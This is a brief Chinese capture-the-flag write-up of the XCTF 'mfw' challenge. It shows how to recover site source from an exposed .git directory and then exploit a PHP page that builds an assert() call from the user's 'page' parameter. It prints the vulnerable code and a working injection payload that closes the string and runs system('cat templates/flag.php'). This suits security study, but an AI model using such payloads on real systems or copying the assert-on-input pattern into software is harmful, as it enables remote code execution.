mfw-攻防世界-git源码泄露

 

 可以通过这里怀疑有.git泄露

访问/.git/目录，发现有

 

 用githack破解得到源码

注意：githack只能用python2

<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

可以知道$file变量是由用户拼接的，我们可以先闭合strpos，然后把后面注释掉，中间就可以构造我们想要得到的内容

所以我们可以构造：

?page=').system('cat templates/flag.php');//

通过'.'拼接字符串或者用or，执行后面的代码，在f12中得到flag